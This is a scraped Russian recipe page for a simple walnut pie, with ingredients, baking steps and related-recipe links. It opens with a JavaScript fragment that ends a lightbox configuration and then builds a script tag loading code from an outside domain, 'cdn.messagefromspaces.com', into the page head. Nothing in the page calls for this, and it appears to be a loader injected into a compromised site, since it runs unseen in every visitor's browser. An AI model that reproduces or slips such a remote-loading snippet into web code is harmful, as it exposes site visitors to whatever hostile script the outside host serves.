, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Ореховый пирог


orehpirogВсе гениальное просто. Наверное, это было сказано про ореховый пирог. Очень просто и очень вкусно!

 

Что и сколько берем:

1. Сливочное масло — 100 гр.

2. Сахар — 1 стакан

3. Яйца — 3 шт.

4. Сметана — 200 гр.

5. Орехи грецкие — 1 стакан

6. Мука — 1 стакан

7. Сода — полложки чайной

 

Начинаем готовить:

Мягкое масло растираем с сахаром, добавляем яйца и сметану. Все ингредиенты очень хорошо перемешиваем до полной однородности массы.  Затем, кладем  соду, погашенную уксусом,  и грецкие орехи (предварительно раздробленные в измельчителе). Добавляем муку и опять все хорошо мешаем. Тесто получается не густым. Форму для выпекания немного смазываем масло и выкладываем наше тесто. Выпекаем минут 30-40 при температуре 200 градусов.

На эту тему вы можете почитать:

Запеканка диетическая
Банановый десерт
Яблочный пирог Марины Цветаевой

Тэги: , ,



Добавить комментарий